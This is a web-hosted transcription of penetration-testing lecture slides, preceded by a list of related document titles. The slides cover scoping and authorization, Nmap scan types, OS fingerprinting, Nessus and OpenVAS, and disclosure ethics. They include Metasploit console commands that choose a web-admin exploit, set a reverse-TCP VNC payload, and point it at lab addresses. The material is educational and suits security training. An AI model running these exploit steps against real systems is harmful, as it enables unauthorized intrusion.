Penetration Testing. What Is a Penetration Testing?



Similar documents
Port Scanning and Vulnerability Assessment. ECE4893 Internetwork Security Georgia Institute of Technology

Port Scanning. Objectives. Introduction: Port Scanning. 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap.

NETWORK SECURITY WITH OPENSOURCE FIREWALL

CIT 380: Securing Computer Systems

Keywords Vulnerability Scanner, Vulnerability assessment, computer security, host security, network security, detecting security flaws, port scanning.

Automated Penetration Testing with the Metasploit Framework. NEO Information Security Forum March 19, 2008

An Introduction to Nmap with a Focus on Information Gathering. Ionuț Ambrosie

Penetration Testing. NTS330 Unit 1 Penetration V1.0. February 20, Juan Ortega. Juan Ortega, juaorteg@uat.edu. 1 Juan Ortega, juaorteg@uat.

1 Scope of Assessment

Attacks and Defense. Phase 1: Reconnaissance

Vulnerability Assessment and Penetration Testing

Installing and Configuring Nessus by Nitesh Dhanjani

Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing. SANS Security Sans Mentor: Daryl Fallin

Scanning Tools. Scan Types. Network sweeping - Basic technique used to determine which of a range of IP addresses map to live hosts.

Introduction. Nmap from an Ethical Hacker's View Part 1. By Kirby Tucker

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

Vinny Hoxha Vinny Hoxha 12/08/2009

IDS and Penetration Testing Lab ISA656 (Attacker)

ITEC441- IS Security. Chapter 15 Performing a Penetration Test

Metasploit Unleashed. Class 2: Information Gathering and Vulnerability Scanning. Georgia Weidman Director of Cyberwarface, Reverse Space

Vulnerability analysis

Penetration Testing Workshop

Learn Ethical Hacking, Become a Pentester

INTRODUCTION: PENETRATION TEST A BUSINESS PERSPECTIVE:

Network Security Exercise #8

PTSv2 in pills: The Best First for Beginners who want to become Penetration Testers. Self-paced, online, flexible access

Presented By: Holes in the Fence. Agenda. IPCCTV Attack. DDos Attack. Why Network Security is Important


Professional Penetration Testing Techniques and Vulnerability Assessment ...

Penetration Testing. Security Testing

Penetration Testing with Kali Linux

Certified Ethical Hacker (CEH)

WHITEPAPER. Nessus Exploit Integration

Chapter 6 Phase 2: Scanning

Lecture 5: Network Attacks I. Course Admin

Network Security. Network Scanning

FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. Chapter 4 Finding Network Vulnerabilities

Profiling Campus Network using Network Penetration Testing

nmap, nessus, and snort Vulnerability Analysis & Intrusion Detection

EVALUATION OF TOOLS FOR CYBER SECURITY

Host Discovery with nmap

AUTHOR CONTACT DETAILS

Running a Default Vulnerability Scan SAINTcorporation.com

Aiming at Higher Network Security Levels Through Extensive PENETRATION TESTING. Anestis Bechtsoudis. abechtsoudis (at) ieee.

Security: Attack and Defense

Vulnerability Assessment Using Nessus

CSE331: Introduction to Networks and Security. Lecture 17 Fall 2006

CRYPTUS DIPLOMA IN IT SECURITY

McAfee Certified Assessment Specialist Network

COURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM

Introduction to Network Security Lab 2 - NMap

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Tools for penetration tests 1. Carlo U. Nicola, HT FHNW With extracts from documents of : Google; Wireshark; nmap; Nessus.

Introduction to Nessus by Harry Anderson last updated October 28, 2003

Computer Forensics Training - Digital Forensics and Electronic Discovery (Mile2)

Author: Sumedt Jitpukdebodin. Organization: ACIS i-secure. ID: My Blog:

MIEIC - SSIN (Computer Security)

Custom Penetration Testing

A Selection of Network Penetration Test Tools

ANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details

An Introduction to Network Vulnerability Testing

Course Title: Penetration Testing: Security Analysis

CS5008: Internet Computing

Demystifying Penetration Testing

Payment Card Industry (PCI) Data Security Standard

Network Mapper and Vulnerability Scanning

Evaluation of Penetration Testing Software. Research

Running a Default Vulnerability Scan

IDS Categories. Sensor Types Host-based (HIDS) sensors collect data from hosts for

Network and Services Discovery

1! Network forensics

Host Fingerprinting and Firewalking With hping

Security of IPv6 and DNSSEC for penetration testers

Vulnerability Assessment Lab

Usage of Vulnerability Tools

ensuring security the way how we do it

The Nexpose Expert System

Vulnerability Assessment and Penetration Testing. CC Faculty ALTTC, Ghaziabad

Nessus - the Vulnerability Scanner Evaluation

SECURITY TOOLS SOFTWARE IN AN OPEN SOURCE ENVIRONMENT. Napoleon Alexandru SIRETEANU *

Lab 3: Recon and Firewalls

PKF Avant Edge. Penetration Testing. Stevie Heong CISSP, CISA, CISM, CGEIT, CCNP

Lab 7: Introduction to Pen Testing (NMAP)

Distributed Port-Scan Attack in Cloud Environment

Armitage. Part 1. Author : r45c4l Mail : infosecpirate@gmail.com.

Penetration Testing SIP Services

NCS 430 Penetration Testing Lab #2 Tuesday, February 10, 2015 John Salamy

Penetration Testing Lessons Learned. Security Research

Penetration Testing Report Client: Business Solutions June 15 th 2015

My FreeScan Vulnerabilities Report

Course Duration: 80Hrs. Course Fee: INR (Certification Lab Exam Cost 2 Attempts)

IDS and Penetration Testing Lab II

AC : TEACHING NETWORK SECURITY THROUGH SIGNA- TURE ANALYSIS OF COMPUTER NETWORK ATTACKS

Is the Scanning of Computer Networks Dangerous?

Network Scanning. What is a Network scanner? Why are scanners needed? How do scanners do? Which scanner does the market provide?

Transcription:

Penetration Testing 1 What Is a Penetration Testing? Testing the security of systems and architectures from the point of view of an attacker (hacker, cracker ) A simulated attack with a predetermined goal that has to be obtained within a fixed time 2

Penetration Testing Is Not An alternative to other IT security measures it complements other tests Expensive game of Capture the Flag A guarantee of security 3 Authorization Letter Detailed agreements/scope Anything off limits? Hours of testing? Social Engineering allowed? War Dialing? War Driving? Denials of Service? Define the end point Consult a lawyer before starting the test 4

To Tell or Not to Tell? Telling too many people may invalidate the test However, you don t want valuable resources chasing a non-existent intruder very long And, elevation procedures make not telling risky 5 Black Box vs. White Box It treats the system as a "black-box", so it doesn't explicitly use knowledge of the internal structure. It allows one to peek inside the "box", and it focuses specifically on using internal knowledge of the software to guide the selection of test data 6

OSSTMM OSSTMM Open-Source Security Testing Methodology Manual Version 3.0 RC 26 at www.osstmm.org http://www.isecom.org/projects/osstmm.htm It defines how to go about performing a pen test, but does not go into the actual tools. 7 Technique Penetration Testing 1) Gather Information 2) Scan IP addresses 3) Fingerprinting 4) Identify vulnerable services 5) Exploit vulnerability (with care!) 6) Fix problems? 8

Gathering Information Goal Given a company s name, determine information like: what IP address ranges they have WHOIS (arin.net ) Nslookup personal information Social engineering Google we.register.it 9 Scan IP Addresses Goal Given a set of IP addresses, determine what services and Operating Systems each is running. Nmap www.nmap.org Gfi languard 10

Fingerprinting What web server is running? What accounts have I found? What services are running? What OSes are running? Who is logged in? Is there available information on the web site? 11 Identify Vulnerable Services Given a specific IP address and port, try to gain access to the machine. Report all known vulnerabilities for this target. Nessus OpenVAS 12

13 14

Exploit vulnerability Try to exploit detected vulnerabilities, for example: Buffer overflow Heap overflow SQL injection Code injection Cross-site scripting Metasploit is a framework that allows to test attacks 15 16

Features License Tools Number of Exploits Updates Alternatives Core Impact Immunity Canvas SecurityForest Metasploit 25.000$ Open-source (but some libraries are only in binaries) 1.450$ Open source 3 months of updates and support Free and Open-source - more of 150 ~2500 (at February 2005) Frequently (weekly) Frequently (average 4 exploit every month) Occasionally (last updates in 2005) Free and Open-source 191 (at October 2007) Occasionally (last updates on October 2007) Platform Only Windows Independent Only Windows Independent Program Language Python Python Perl for framework, many others languages for exploits (C,Perl,Python,Ruby,Sh ell,...) Ruby, C, Assembler Advantages Report system / Integrationwith vulnerability assessment tools 0-day payload Number of precompiled exploits (see ExploitationTree) Free / IDS-IPS evasion / support to write exploits and large used in security community Penetration Test Tutorial 18

Nmap (Network Mapper) Port Division - open, closed, filtered, unfiltered, open filtered and closed filtered Scanning techniques -ss (TCP SYN scan) -st (TCP connect() scan) -su (UDP scans) -sa (TCP ACK scan) -sw (TCP Window scan) -sm (TCP Maimon scan) --scanflags (Custom TCP scan) -si <zombie host[:probeport]> (Idlescan) -so (IP protocol scan) -sn; -sf; -sx (TCP Null, FIN, and Xmas scans) -b <ftp relay host> (FTP bounce scan) 19 Identify active hosts and services in the network ping sweep useful to identify targets and to verify also rogue hosts Ex: nmap -v -sp 192.168.100.0/24 -sp Ping scan. port scanning useful to identify active ports (services or daemons) that are running on the targets Ex: nmap -v -st 192.168.100.x -st normal scan -ss stealth scan 20

Identify target OS version OS Fingerprinting: there are different values for each OS (Ex. TCP stack, ) Ex: Nmap O <target> linux 2.4 linux 2.6 openbsd windows 9x windows 2000windows xp ttl 64 64 64 32 128 128 packet length 60 60 64 48 48 48 initial windows 5840 5840 16384 9000 16384 16384 mss 512 512 1460 1460 1460 1460 ip id 0 random random Increment increment increment enabled tcp opt MNNTNW MNNTNW M M MNNT MNW timestamp inc. 100hz 1000hz unsupported unsupported unsupported unsupported sack OK OK OK OK OK OK SYN attempts 5 5 4 3 3 3 21 Vulnerability scanning Nessus is a leader tool in vulnerability scanning There are two components : nessusd server with plugins list of known vulnerabilities (there are different kinds of subscription depending on how old are plugins) nessus is a front end of the tool there are several version for windows and linux systems 22

Introduction to Nessus Created by Renaud Deraison Currently Maintained by Tenable Network Security Uses the NASL Scripting language for it s plugins (currently over 13,000 plugins!) Price is still Free! But no more open source Register to obtain many NASL plugins (7 day delay). Or Purchase a Direct Feed for the Latest! 23 Nessus Features Client/Server Architecture SSL/PKI supported Smart Service Recognition (i.e. FTP on 31337) Non-Destructive or Thorough Tests Vulnerability Mapping to CVE, Bugtraq, and others Vulnerability Scoring using CVSS from NIST. 24

OpenVAS OpenSource Vulnerability Assessment Scanner Previously GNessUs (a GPL fork of the Nessus) OpenVAS is a security scanner to allow future free development of the now-proprietary NESSUS tool OpenVAS now offers 15 000 Network Vulnerability Tests (NVTs) more all NASL plugins. 25 Open VAS technology 26

Exploit vulnerabilities metasploit is a framework that allows to perform real attacks You need to start metasploit from the start menu (Penetration Test->Framework 3) msfconsole 27 Select the exploit and the payload Select an exploit: msf > use windows/http/altn_webadmin msf exploit(altn_webadmin) > Select the payload for the exploit (setting the PAYLOAD global datastore) msf exploit(altn_webadmin) > set PAYLOAD windows/vncinject/reverse_tcp PAYLOAD => windows/vncinject/reverse_tcp 28

Set options for exploit and payload Show options msf exploit(altn_webadmin) > show options Set the options: msf > set RHOST 192.168.100.x TARGET IP msf > set RPORT 1000 VULNERABLE SERVICE msf > set LHOST 192.168.100.Y ATTACKER IP msf > set TARGET 0 TYPE OF EXPLOIT Launch the exploit msf exploit(altn_webadmin) > exploit 29 Vulnerabilities disclosure If we find a new vulnerability (Zero Day Vulnerability) What we have to do? Do not say anything and maintain the secret perhaps in the future the producer will fix it Spread the information: to all or just to the producer Which level of detail reveal Full disclosure with possibility of helping cracker? Partial disclosure that could be unuseful? Sell it 30

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information